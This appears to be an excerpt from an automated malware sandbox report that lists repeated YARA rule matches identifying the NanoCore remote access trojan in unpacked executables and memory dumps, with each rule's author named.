      Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 22.2.RegSvcs.exe.2c4e71c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 22.2.RegSvcs.exe.2c4e71c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 22.2.RegSvcs.exe.2c4e71c.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
